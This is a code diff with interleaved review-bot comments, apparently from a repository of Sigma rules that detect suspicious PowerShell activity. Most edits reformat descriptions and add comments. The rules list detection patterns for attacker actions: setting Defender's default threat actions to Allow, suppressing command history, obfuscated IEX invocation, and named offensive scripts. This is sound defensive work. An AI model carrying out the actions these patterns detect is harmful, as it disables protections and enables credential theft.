b/sigma/builtin/powershell/powershell_classic/posh_pc_susp_zip_compress.yml 
@@ -1,22 +1,16 @@ title: Zip A Folder With PowerShell For Staging In Temp - PowerShell -id: 71ff406e-b633-4989-96ec-bc49d825a412 +id: 71ff406e-b633-4989-96ec-bc49d825a412 # PowerShell Classic related: - - id: daf7eb81-35fd-410d-9d7a-657837e602bb - type: similar - - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 - type: similar - - id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 - type: similar + - id: daf7eb81-35fd-410d-9d7a-657837e602bb # PowerShell Module + type: similar + - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 # PowerShell Script + type: similar + - id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 # Process Creation + type: similar status: test -description: 'Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet - in order to compress folders and files where the output is stored in a potentially - suspicious location that is used often by malware for exfiltration. - - An adversary might compress data (e.g., sensitive documents) that is collected - prior to exfiltration in order to make it portable and minimize the amount of - data sent over the network. - - ' +description: | + Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. + An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_tamper_windows_defender_set_mp.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_tamper_windows_defender_set_mp.yml index e073f82a1..2869d17ce 100644 
--- a/sigma/builtin/powershell/powershell_classic/posh_pc_tamper_windows_defender_set_mp.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_tamper_windows_defender_set_mp.yml @@ -1,11 +1,10 @@ title: Tamper Windows Defender - PSClassic id: ec19ebab-72dc-40e1-9728-4c0b805d722c related: - - id: 14c71865-6cd3-44ae-adaa-1db923fae5f2 - type: similar + - id: 14c71865-6cd3-44ae-adaa-1db923fae5f2 + type: similar status: experimental -description: Attempting to disable scheduled scanning and other parts of Windows Defender - ATP or set default actions to allow. +description: Attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md author: frack113, Nasreddine Bencherchali (Nextron Systems) @@ -79,10 +78,8 @@ detection: - mtdefac Allow - SevereThreatDefaultAction Allow - stdefac Allow - condition: ps_classic_provider_start and (selection_set_mppreference and 1 of - selection_options_*) + condition: ps_classic_provider_start and (selection_set_mppreference and 1 of selection_options_*) falsepositives: - - Legitimate PowerShell scripts that disable Windows Defender for troubleshooting - purposes. Must be investigated. + - Legitimate PowerShell scripts that disable Windows Defender for troubleshooting purposes. Must be investigated. level: high ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml index 8c950bdfe..56b85a103 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml 
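Review bot: The re-flowed description still says "Windows Defender ATP", but the rule keys on Set-MpPreference (selection_set_mppreference), which changes Microsoft Defender Antivirus preferences rather than Defender for Endpoint/ATP settings; the wording will mislead analysts triaging the alert. Suggest `description: Attempts to disable scheduled scanning and other parts of Microsoft Defender Antivirus via Set-MpPreference, or to set the default threat actions to Allow.` The selection_options list in the second hunk is unchanged apart from the condition re-flow, so nothing else in the detection logic is affected.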
@@ -1,8 +1,7 @@ title: Suspicious Non PowerShell WSMAN COM Provider id: df9a0e0e-fedb-4d6c-8668-d765dfc92aa7 status: test -description: Detects suspicious use of the WSMAN provider without PowerShell.exe as - the host application. +description: Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application. references: - https://twitter.com/chadtilbury/status/1275851297770610688 - https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/ @@ -28,6 +27,7 @@ detection: - HostApplication=powershell - HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell - HostApplication=C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell + # In some cases powershell was invoked with inverted slashes - HostApplication=C:/Windows/System32/WindowsPowerShell/v1.0/powershell - HostApplication=C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell condition: powershell_classic and (selection and not 1 of filter_main_*) diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_xor_commandline.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_xor_commandline.yml index b8061f402..cad284c6d 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_xor_commandline.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_xor_commandline.yml @@ -1,8 +1,7 @@ title: Suspicious XOR Encoded PowerShell Command Line - PowerShell id: 812837bb-b17f-45e9-8bd0-0ec35d2e3bd6 status: test -description: Detects suspicious powershell process which includes bxor command, alternative - obfuscation method to b64 encoded commands. +description: Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands. references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46 author: Teymur Kheirkhabarov, Harish Segar (rule) 
diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml b/sigma/builtin/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml index 502c1af63..355fa2573 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml @@ -1,13 +1,12 @@ title: Potential Active Directory Enumeration Using AD Module - PsModule id: 74176142-4684-4d8a-8b0a-713257e7df8e related: - - id: 70bc5215-526f-4477-963c-a47a5c9ebd12 - type: similar - - id: 9e620995-f2d8-4630-8430-4afd89f77604 - type: similar + - id: 70bc5215-526f-4477-963c-a47a5c9ebd12 + type: similar + - id: 9e620995-f2d8-4630-8430-4afd89f77604 + type: similar status: test -description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" - DLL. Which is often used by attackers to perform AD enumeration. +description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration. references: - https://github.com/samratashok/ADModule - https://twitter.com/cyb3rops/status/1617108657166061568?s=20 diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml b/sigma/builtin/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml index 61b6a3595..eb78bb57f 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml 
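Review bot: The re-flowed description keeps the module name as `Microsoft.ActiveDirectory.Management.dl`, which reads as a typo for `.dll`; the detection block is outside this hunk, so I cannot tell whether the truncated spelling mirrors a deliberate `contains` pattern. If it is intentional, say so, e.g. `Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dll" DLL (matched on the truncated string "Microsoft.ActiveDirectory.Management.dl")`; otherwise fix the extension in the description.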
@@ -1,8 +1,7 @@ title: Alternate PowerShell Hosts - PowerShell Module id: 64e8e417-c19a-475a-8d19-98ea705394cc status: test -description: Detects alternate PowerShell hosts potentially bypassing detections looking - for powershell.exe +description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe references: - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html author: Roberto Rodriguez @Cyb3rWard0g @@ -24,17 +23,21 @@ detection: selection: ContextInfo|contains: '*' filter_powershell: + # This filter covers the following use cases + # - When powershell is called directly from commandline via keyword powershell or powershell.exe + # - Or called via path but not with full "".exe". Example: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell ContextInfo|contains: - - = powershell + - = powershell # Host Application=...powershell.exe or Application hote=...powershell.exe in French Win10 event - = C:\Windows\System32\WindowsPowerShell\v1.0\powershell - = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell + # In some cases powershell was invoked with inverted slashes - = C:/Windows/System32/WindowsPowerShell/v1.0/powershell - = C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell filter_sdiagnhost: - ContextInfo|contains: = C:\WINDOWS\System32\sdiagnhost.exe -Embedding + ContextInfo|contains: = C:\WINDOWS\System32\sdiagnhost.exe -Embedding # When MSDT is launched for example filter_citrix: ContextInfo|contains: ConfigSyncRun.exe - filter_adace: + filter_adace: # Active Directory Administrative Center Enhancements ContextInfo|contains: C:\Windows\system32\dsac.exe filter_winrm: ContextInfo|contains: C:\Windows\system32\wsmprovhost.exe -Embedding diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml b/sigma/builtin/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml index 0727f99ad..21fa9da13 100644 
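Review bot: The new comment on filter_sdiagnhost documents that `C:\WINDOWS\System32\sdiagnhost.exe -Embedding` is excluded "when MSDT is launched", but that is precisely the host in which the 2022 msdt troubleshooting-pack abuse (the "Follina" issue) ran attacker-controlled PowerShell, so this rule will not see that case; the exclusion should at least be stated as a known blind spot, e.g. `# Known gap: sdiagnhost.exe is also the host used by msdt-based abuse (troubleshooting packs), those executions are filtered here`. Separately, the `= powershell` entry in filter_powershell is matched anywhere in ContextInfo, which (if the event carries the usual `Command Name = …` field) would also suppress an alternate host whose pipeline invokes `powershell` as a command; anchoring on `Host Application = powershell` plus the localized variants the comment mentions would avoid that, if the French-layout concern allows it.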
--- a/sigma/builtin/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml @@ -1,18 +1,13 @@ title: Bad Opsec Powershell Code Artifacts id: 8d31a8ce-46b5-4dd6-bdc3-680931f1db86 related: - - id: 73e733cc-1ace-3212-a107-ff2523cc9fc3 - type: derived + - id: 73e733cc-1ace-3212-a107-ff2523cc9fc3 + type: derived status: test -description: 'focuses on trivial artifacts observed in variants of prevalent offensive - ps1 payloads, including - - Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other - attack payloads - +description: | + focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including + Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec. - - ' references: - https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/ - https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/ @@ -43,7 +38,6 @@ detection: - '0xdeadbeef' condition: ps_module and selection_4103 falsepositives: - - Moderate-to-low; Despite the shorter length/lower entropy for some of these, - because of high specificity, fp appears to be fairly limited in many environments. + - Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments. level: critical ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_clear_powershell_history.yml b/sigma/builtin/powershell/powershell_module/posh_pm_clear_powershell_history.yml index 714a57fd3..997f2cd7d 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_clear_powershell_history.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_clear_powershell_history.yml 
@@ -1,8 +1,8 @@ title: Clear PowerShell History - PowerShell Module id: f99276ad-d122-4989-a09a-d00904a5f9d2 related: - - id: dfba4ce1-e0ea-495f-986e-97140f31af2d - type: derived + - id: dfba4ce1-e0ea-495f-986e-97140f31af2d + type: derived status: test description: Detects keywords that could indicate clearing PowerShell history references: @@ -33,7 +33,7 @@ detection: selection_payload_2: Payload|contains|all: - Set-PSReadlineOption - - "\u2013HistorySaveStyle" + - –HistorySaveStyle # not sure if the homoglyph –/- is intended, just checking for both - SaveNothing selection_payload_3: Payload|contains|all: diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_decompress_commands.yml b/sigma/builtin/powershell/powershell_module/posh_pm_decompress_commands.yml index 7b294c85b..8cfc11dd0 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_decompress_commands.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_decompress_commands.yml @@ -1,11 +1,10 @@ title: PowerShell Decompress Commands id: 1ddc1472-8e52-4f7d-9f11-eab14fc171f5 related: - - id: 81fbdce6-ee49-485a-908d-1a728c5dcb09 - type: derived + - id: 81fbdce6-ee49-485a-908d-1a728c5dcb09 + type: derived status: test -description: A General detection for specific decompress commands in PowerShell logs. - This could be an adversary decompressing files. +description: A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/8 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.md diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_exploit_scripts.yml b/sigma/builtin/powershell/powershell_module/posh_pm_exploit_scripts.yml index 5a857275c..b642d46b0 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_exploit_scripts.yml 
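Review bot: Replacing `"\u2013HistorySaveStyle"` with a literal en dash makes selection_payload_2 depend on the file, the converter and the backend all preserving UTF-8 byte-for-byte; the escaped form was robust to that, so I would keep `"\u2013HistorySaveStyle"` and put the explanation in the comment. The added comment also says "just checking for both", but this selection lists only the en-dash spelling; unless a sibling selection outside the hunk covers the ASCII `-HistorySaveStyle`, the ordinary `Set-PSReadlineOption -HistorySaveStyle SaveNothing` is not matched by this block, and the comment should say which selection covers which variant.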
+++ b/sigma/builtin/powershell/powershell_module/posh_pm_exploit_scripts.yml @@ -1,13 +1,12 @@ title: Malicious PowerShell Scripts - PoshModule id: 41025fd7-0466-4650-a813-574aaacbe7f4 related: - - id: f331aa1f-8c53-4fc3-b083-cc159bc971cb - type: similar - - id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 - type: obsoletes + - id: f331aa1f-8c53-4fc3-b083-cc159bc971cb + type: similar + - id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 + type: obsoletes status: test -description: Detects the execution of known offensive powershell scripts used for - exploitation or reconnaissance +description: Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance references: - https://github.com/PowerShellMafia/PowerSploit - https://github.com/NetSPI/PowerUpSQL @@ -20,8 +19,8 @@ references: - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1 - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1 - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1 - - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ - - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ + - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec + - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec - https://github.com/HarmJ0y/DAMP - https://github.com/samratashok/nishang - https://github.com/DarkCoderSc/PowerRunAsSystem/ @@ -267,7 +266,7 @@ detection: - WSUSpendu.ps1 selection_invoke_sharp: ContextInfo|contains|all: - - Invoke-Sharp + - Invoke-Sharp # Covers all "Invoke-Sharp" variants - .ps1 condition: ps_module and (1 of selection_*) falsepositives: 
diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_get_addbaccount.yml b/sigma/builtin/powershell/powershell_module/posh_pm_get_addbaccount.yml index 56b40873f..501498ff1 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_get_addbaccount.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_get_addbaccount.yml @@ -1,9 +1,7 @@ title: Suspicious Get-ADDBAccount Usage id: b140afd9-474b-4072-958e-2ebb435abd68 status: test -description: Detects suspicious invocation of the Get-ADDBAccount script that reads - from a ntds.dit file and may be used to get access to credentials without using - any credential dumpers +description: Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers references: - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/ - https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_get_clipboard.yml b/sigma/builtin/powershell/powershell_module/posh_pm_get_clipboard.yml index 258e0ff51..908ee56ea 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_get_clipboard.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_get_clipboard.yml 
@@ -1,8 +1,7 @@ title: PowerShell Get Clipboard id: 4cbd4f12-2e22-43e3-882f-bff3247ffb78 status: test -description: A General detection for the Get-Clipboard commands in PowerShell logs. - This could be an adversary capturing clipboard contents. +description: A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/16 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.md diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml index 6065475e9..e45918c87 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation CLIP+ Launcher - PowerShell Module id: a136cde0-61ad-4a61-9b82-8dc490e60dd2 related: - - id: 73e67340-0d25-11eb-adc1-0242ac120002 - type: derived + - id: 73e67340-0d25-11eb-adc1-0242ac120002 + type: derived status: test description: Detects Obfuscated use of Clip.exe to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 26) author: Jonathan Cheong, oscd.community date: 2020/10/13 modified: 2022/12/02 diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml index 2db20a62c..a28c41132 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml 
@@ -1,12 +1,10 @@ title: Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module id: 2f211361-7dce-442d-b78a-c04039677378 related: - - id: 1b9dc62e-6e9e-42a3-8990-94d7a10007f7 - type: derived + - id: 1b9dc62e-6e9e-42a3-8990-94d7a10007f7 + type: derived status: test -description: Detects all variations of obfuscated powershell IEX invocation code generated - by Invoke-Obfuscation framework from the code block cited in the reference section - below +description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below references: - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community @@ -28,13 +26,13 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection_payload: - - Payload|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ - - Payload|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ - - Payload|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ - - Payload|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} - - Payload|re: \*mdr\*\W\s*\)\.Name - - Payload|re: \$VerbosePreference\.ToString\( - - Payload|re: \[String\]\s*\$VerbosePreference + - Payload|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ + - Payload|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ + - Payload|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ + - Payload|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} + - Payload|re: \*mdr\*\W\s*\)\.Name + - Payload|re: \$VerbosePreference\.ToString\( + - Payload|re: \[String\]\s*\$VerbosePreference condition: ps_module and selection_payload falsepositives: - Unknown 
diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml index efa16acc3..e10c3e6b7 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation STDIN+ Launcher - PowerShell Module id: 9ac8b09b-45de-4a07-9da1-0de8c09304a3 related: - - id: 779c8c12-0eb1-11eb-adc1-0242ac120002 - type: derived + - id: 779c8c12-0eb1-11eb-adc1-0242ac120002 + type: derived status: test description: Detects Obfuscated use of stdin to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 25) author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2022/12/02 diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml index 1f11a528a..0a9fe2ae1 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation VAR+ Launcher - PowerShell Module id: 6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e related: - - id: 0adfbc14-0ed1-11eb-adc1-0242ac120002 - type: derived + - id: 0adfbc14-0ed1-11eb-adc1-0242ac120002 + type: derived status: test description: Detects Obfuscated use of Environment Variables to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 24) author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2022/12/02 
diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml index 8053cd190..a048f04ec 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module id: 7034cbbb-cc55-4dc2-8dad-36c0b942e8f1 related: - - id: 20e5497e-331c-4cd5-8d36-935f6e2a9a07 - type: derived + - id: 20e5497e-331c-4cd5-8d36-935f6e2a9a07 + type: derived status: test description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19) author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2022/11/29 diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml index 5a123b659..2807a53c0 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module id: a23791fe-8846-485a-b16b-ca691e1b03d4 related: - - id: e6cb92b4-b470-4eb8-8a9d-d63e8583aae0 - type: derived + - id: e6cb92b4-b470-4eb8-8a9d-d63e8583aae0 + type: derived status: test description: Detects Obfuscated Powershell via RUNDLL LAUNCHER references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 23) author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2022/11/29 
diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml index ebc5d4b43..398130775 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation Via Stdin - PowerShell Module id: c72aca44-8d52-45ad-8f81-f96c4d3c755e related: - - id: 86b896ba-ffa1-4fea-83e3-ee28a4c915c7 - type: derived + - id: 86b896ba-ffa1-4fea-83e3-ee28a4c915c7 + type: derived status: test description: Detects Obfuscated Powershell via Stdin in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task28) author: Nikita Nazarov, oscd.community date: 2020/10/12 modified: 2022/11/29 diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml index 098618cce..bcbbdf95c 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation Via Use Clip - PowerShell Module id: ebdf49d8-b89c-46c9-8fdf-2c308406f6bd related: - - id: db92dd33-a3ad-49cf-8c2c-608c3e30ace0 - type: derived + - id: db92dd33-a3ad-49cf-8c2c-608c3e30ace0 + type: derived status: test description: Detects Obfuscated Powershell via use Clip.exe in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task29) author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/11/29 
diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml index 779e3f73f..2e3e2cb85 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation Via Use MSHTA - PowerShell Module id: 07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb related: - - id: e55a5195-4724-480e-a77e-3ebe64bd3759 - type: derived + - id: e55a5195-4724-480e-a77e-3ebe64bd3759 + type: derived status: test description: Detects Obfuscated Powershell via use MSHTA in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task31) author: Nikita Nazarov, oscd.community date: 2020/10/08 modified: 2023/01/04 diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml index 052b8742a..ccacd67e5 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml @@ -1,8 +1,8 @@ title: Invoke-Obfuscation Via Use Rundll32 - PowerShell Module id: 88a22f69-62f9-4b8a-aa00-6b0212f2f05a related: - - id: a5a30a6e-75ca-4233-8b8c-42e0f2037d3b - type: derived + - id: a5a30a6e-75ca-4233-8b8c-42e0f2037d3b + type: derived status: test description: Detects Obfuscated Powershell via use Rundll32 in Scripts references: diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml index 0c50772a7..a51c4915b 100644 
